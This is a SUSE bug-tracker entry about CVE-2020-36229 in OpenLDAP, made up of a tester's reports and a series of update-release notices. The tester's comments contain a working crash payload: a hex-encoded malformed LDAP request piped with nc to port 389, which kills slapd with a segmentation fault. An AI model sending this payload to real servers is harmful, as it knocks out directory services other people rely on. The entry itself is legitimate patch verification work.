Bug 1182411 - (CVE-2020-36229) VUL-0: CVE-2020-36229: openldap2: Type confusion in ad_keystring in ad.c
Status: RESOLVED FIXED
Classification: Novell Products
Product: SUSE Security Incidents
Component: Incidents
Priority: P3 - Medium
Severity: Major
Assigned To: Security Team bot
https://smash.suse.de/issue/276465/
CVSSv3.1:SUSE:CVE-2020-36229:7.5:(AV:...
Reported: 2021-02-18 09:40 UTC by Alexander Bergmann
Modified: 2021-08-16 11:27 UTC (History)
Found By: Security Response Team

Comment 2 jun wang 2021-03-02 13:32:56 UTC
I am testing openldap2 update SUSE:Maintenance:18481:236954, and following the link https://bugs.openldap.org/show_bug.cgi?id=9425#c0, I ran the command BEFORE and AFTER and got the same failed slapd service:

# echo -en '\x30\x82\x01\xe4\x02\x04\x30\x30\x30\x30\x4a\x82\x01\x30\x4f\x3d\xef\xbe\xb2\xef\xbe\xb2\xef\xbe\xb2\xef\xbe\xb2\xef\xbe\xb2\xef\xbe\xb2\xef\xa7\xb2\xef\xbe\xb2\xef\xb6\xb2\xef\xbe\xb2\xef\xbe\xb2\xef\xbe\xb2\xef\xbe\xb2\xef\xbe\xb2\xef\xbe\xb2\xef\xbe\xb2\x2c\x0a\x0a\x0a\x32\x2e\x35\x2e\x34\x2e\x33\x39\x3d\x30\x6b\x30\x30\x30\x06\x30\x30\x30\x30\x30\x30\x30\x06\x31\x7f\x30\x7f\x06\x06\x18\x18\x30\x30\x30\x30\x30\x31\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x38\x2e\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x06\x03\x30\x30\x30\x30\x03\x30\x30\x30\x30\x30\x06\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x03\x03\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30' | nc localhost 389

# systemctl status slapd.service 
● slapd.service - OpenLDAP Server Daemon
   Loaded: loaded (/usr/lib/systemd/system/slapd.service; disabled; vendor preset: disabled)
   Active: failed (Result: signal) since Tue 2021-03-02 21:32:10 CST; 1s ago
  Process: 31999 ExecStart=/usr/lib/openldap/start (code=exited, status=0/SUCCESS)
 Main PID: 32013 (code=killed, signal=SEGV)

Mar 02 21:32:00 linux-zeaz slapd[31999]: looking for plugins in '/usr/lib64/sasl2', failed to open directory, er>
Mar 02 21:32:00 linux-zeaz slapd[31999]: @(#) $OpenLDAP: slapd 2.4.46 $
                                                 opensuse-buildservice@opensuse.org
Mar 02 21:32:05 linux-zeaz slapd[31999]: looking for plugins in '/usr/lib64/sasl2', failed to open directory, er>
Mar 02 21:32:05 linux-zeaz slapd[32013]: slapd starting
Mar 02 21:32:05 linux-zeaz start[31999]: Starting ldap-server
Mar 02 21:32:05 linux-zeaz systemd[1]: Started OpenLDAP Server Daemon.
Mar 02 21:32:10 linux-zeaz slapd[32013]: conn=1000 fd=11 ACCEPT from IP=[::1]:39890 (IP=[::]:389)
Mar 02 21:32:10 linux-zeaz systemd[1]: slapd.service: Main process exited, code=killed, status=11/SEGV
Mar 02 21:32:10 linux-zeaz systemd[1]: slapd.service: Unit entered failed state.
Mar 02 21:32:10 linux-zeaz systemd[1]: slapd.service: Failed with result 'signal'.

Is this expected? This is a security update, I find it a little hard to understand.
Comment 3 Swamp Workflow Management 2021-03-03 20:19:00 UTC
SUSE-SU-2021:0693-1: An update that fixes 11 vulnerabilities is now available.

Category: security (important)
Bug References: 1182279,1182408,1182411,1182412,1182413,1182415,1182416,1182417,1182418,1182419,1182420
CVE References: CVE-2020-36221,CVE-2020-36222,CVE-2020-36223,CVE-2020-36224,CVE-2020-36225,CVE-2020-36226,CVE-2020-36227,CVE-2020-36228,CVE-2020-36229,CVE-2020-36230,CVE-2021-27212
JIRA References: 
Sources used:
SUSE OpenStack Cloud Crowbar 9 (src):    openldap2-2.4.41-18.83.1
SUSE OpenStack Cloud Crowbar 8 (src):    openldap2-2.4.41-18.83.1
SUSE OpenStack Cloud 9 (src):    openldap2-2.4.41-18.83.1
SUSE OpenStack Cloud 8 (src):    openldap2-2.4.41-18.83.1
SUSE OpenStack Cloud 7 (src):    openldap2-2.4.41-18.83.1
SUSE Linux Enterprise Software Development Kit 12-SP5 (src):    openldap2-2.4.41-18.83.1
SUSE Linux Enterprise Server for SAP 12-SP4 (src):    openldap2-2.4.41-18.83.1
SUSE Linux Enterprise Server for SAP 12-SP3 (src):    openldap2-2.4.41-18.83.1
SUSE Linux Enterprise Server for SAP 12-SP2 (src):    openldap2-2.4.41-18.83.1
SUSE Linux Enterprise Server 12-SP5 (src):    openldap2-2.4.41-18.83.1
SUSE Linux Enterprise Server 12-SP4-LTSS (src):    openldap2-2.4.41-18.83.1
SUSE Linux Enterprise Server 12-SP3-LTSS (src):    openldap2-2.4.41-18.83.1
SUSE Linux Enterprise Server 12-SP3-BCL (src):    openldap2-2.4.41-18.83.1
SUSE Linux Enterprise Server 12-SP2-LTSS (src):    openldap2-2.4.41-18.83.1
SUSE Linux Enterprise Server 12-SP2-BCL (src):    openldap2-2.4.41-18.83.1
HPE Helion Openstack 8 (src):    openldap2-2.4.41-18.83.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 4 Swamp Workflow Management 2021-03-03 20:23:38 UTC
SUSE-SU-2021:0692-1: An update that fixes 11 vulnerabilities is now available.

Category: security (important)
Bug References: 1182279,1182408,1182411,1182412,1182413,1182415,1182416,1182417,1182418,1182419,1182420
CVE References: CVE-2020-36221,CVE-2020-36222,CVE-2020-36223,CVE-2020-36224,CVE-2020-36225,CVE-2020-36226,CVE-2020-36227,CVE-2020-36228,CVE-2020-36229,CVE-2020-36230,CVE-2021-27212
JIRA References: 
Sources used:
SUSE Linux Enterprise Server for SAP 12-SP5 (src):    openldap2-2.4.41-39.1
SUSE Linux Enterprise Server for SAP 12-SP4 (src):    openldap2-2.4.41-39.1
SUSE Linux Enterprise Server for SAP 12-SP3 (src):    openldap2-2.4.41-39.1
SUSE Linux Enterprise Server for SAP 12-SP2 (src):    openldap2-2.4.41-39.1
SUSE Linux Enterprise Module for Legacy Software 12 (src):    openldap2-2.4.41-39.1

Comment 5 jun wang 2021-03-04 07:08:42 UTC
I simply debugged this bug after the update, and got the output:

# /usr/lib/openldap/start
...
Starting ldap-server+ exec /usr/sbin/slapd -d 3 -h 'ldap:///  ldapi:///' -f /etc/openldap/slapd.conf -u ldap -g ldap -o slp=off
...
604086a5 slap_listener_activate(8): 
604086a5 >>> slap_listener(ldap:///)
604086a5 connection_get(13): got connid=1000
604086a5 connection_read(13): checking for input on id=1000
ber_get_next
ldap_read: want=8, got=8
  0000:  30 82 01 e4 02 04 30 30                            0.....00          
ldap_read: want=480, got=480
ber_get_next: tag 0x30 len 484 contents:
604086a5 op tag 0x4a, time 1614841509
ber_get_next
ldap_read: want=8 error=Resource temporarily unavailable
604086a5 conn=1000 op=0 do_delete
ber_scanf fmt (m) ber:
604086a5 <= get_ctrls: n=0 rc=0 err=""
604086a5 >>> dnPrettyNormal: <O=ᄇᄇᄇᄇᄇᄇ鱗ᄇﶲᄇᄇᄇᄇᄇᄇᄇ,


2.5.4.39=0k00000000001000000100000000000000000008.000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000>
Segmentation fault

Does this mean that this bug is not fixed?
Comment 6 jun wang 2021-03-04 07:09:52 UTC
Sorry, the debug from the above comment happened on SLES15SP1.
Comment 7 Swamp Workflow Management 2021-03-08 20:20:07 UTC
SUSE-SU-2021:0723-1: An update that fixes 11 vulnerabilities is now available.

Category: security (important)
Bug References: 1182279,1182408,1182411,1182412,1182413,1182415,1182416,1182417,1182418,1182419,1182420
CVE References: CVE-2020-36221,CVE-2020-36222,CVE-2020-36223,CVE-2020-36224,CVE-2020-36225,CVE-2020-36226,CVE-2020-36227,CVE-2020-36228,CVE-2020-36229,CVE-2020-36230,CVE-2021-27212
JIRA References: 
Sources used:
SUSE Manager Server 4.0 (src):    openldap2-2.4.46-9.48.1
SUSE Manager Retail Branch Server 4.0 (src):    openldap2-2.4.46-9.48.1
SUSE Manager Proxy 4.0 (src):    openldap2-2.4.46-9.48.1
SUSE Linux Enterprise Server for SAP 15-SP1 (src):    openldap2-2.4.46-9.48.1
SUSE Linux Enterprise Server for SAP 15 (src):    openldap2-2.4.46-9.48.1
SUSE Linux Enterprise Server 15-SP1-LTSS (src):    openldap2-2.4.46-9.48.1
SUSE Linux Enterprise Server 15-SP1-BCL (src):    openldap2-2.4.46-9.48.1
SUSE Linux Enterprise Server 15-LTSS (src):    openldap2-2.4.46-9.48.1
SUSE Linux Enterprise Module for Legacy Software 15-SP3 (src):    openldap2-2.4.46-9.48.1
SUSE Linux Enterprise Module for Legacy Software 15-SP2 (src):    openldap2-2.4.46-9.48.1
SUSE Linux Enterprise Module for Development Tools 15-SP3 (src):    openldap2-2.4.46-9.48.1
SUSE Linux Enterprise Module for Development Tools 15-SP2 (src):    openldap2-2.4.46-9.48.1
SUSE Linux Enterprise Module for Basesystem 15-SP3 (src):    openldap2-2.4.46-9.48.1
SUSE Linux Enterprise Module for Basesystem 15-SP2 (src):    openldap2-2.4.46-9.48.1
SUSE Linux Enterprise High Performance Computing 15-SP1-LTSS (src):    openldap2-2.4.46-9.48.1
SUSE Linux Enterprise High Performance Computing 15-SP1-ESPOS (src):    openldap2-2.4.46-9.48.1
SUSE Linux Enterprise High Performance Computing 15-LTSS (src):    openldap2-2.4.46-9.48.1
SUSE Linux Enterprise High Performance Computing 15-ESPOS (src):    openldap2-2.4.46-9.48.1
SUSE Enterprise Storage 6 (src):    openldap2-2.4.46-9.48.1
SUSE CaaS Platform 4.0 (src):    openldap2-2.4.46-9.48.1

Comment 8 Swamp Workflow Management 2021-03-14 17:33:42 UTC
openSUSE-SU-2021:0408-1: An update that fixes 11 vulnerabilities is now available.

Category: security (important)
Bug References: 1182279,1182408,1182411,1182412,1182413,1182415,1182416,1182417,1182418,1182419,1182420
CVE References: CVE-2020-36221,CVE-2020-36222,CVE-2020-36223,CVE-2020-36224,CVE-2020-36225,CVE-2020-36226,CVE-2020-36227,CVE-2020-36228,CVE-2020-36229,CVE-2020-36230,CVE-2021-27212
JIRA References: 
Sources used:
openSUSE Leap 15.2 (src):    openldap2-2.4.46-lp152.14.18.1
Comment 12 Swamp Workflow Management 2021-04-16 13:16:20 UTC
SUSE-SU-2021:14700-1: An update that solves 11 vulnerabilities and has one errata is now available.

Category: security (important)
Bug References: 1182279,1182408,1182411,1182412,1182413,1182415,1182416,1182417,1182418,1182419,1182420,1184020
CVE References: CVE-2020-36221,CVE-2020-36222,CVE-2020-36223,CVE-2020-36224,CVE-2020-36225,CVE-2020-36226,CVE-2020-36227,CVE-2020-36228,CVE-2020-36229,CVE-2020-36230,CVE-2021-27212
JIRA References: 
Sources used:
SUSE Linux Enterprise Server 11-SP4-LTSS (src):    openldap2-2.4.26-0.74.26.1, openldap2-client-2.4.26-0.74.26.1
SUSE Linux Enterprise Server 11-SECURITY (src):    openldap2-client-openssl1-2.4.26-0.74.26.1
SUSE Linux Enterprise Point of Sale 11-SP3 (src):    openldap2-2.4.26-0.74.26.1, openldap2-client-2.4.26-0.74.26.1
SUSE Linux Enterprise Debuginfo 11-SP4 (src):    openldap2-2.4.26-0.74.26.1, openldap2-client-2.4.26-0.74.26.1
SUSE Linux Enterprise Debuginfo 11-SP3 (src):    openldap2-2.4.26-0.74.26.1, openldap2-client-2.4.26-0.74.26.1, openldap2-client-openssl1-2.4.26-0.74.26.1

Comment 13 Marcus Meissner 2021-08-16 11:27:00 UTC
released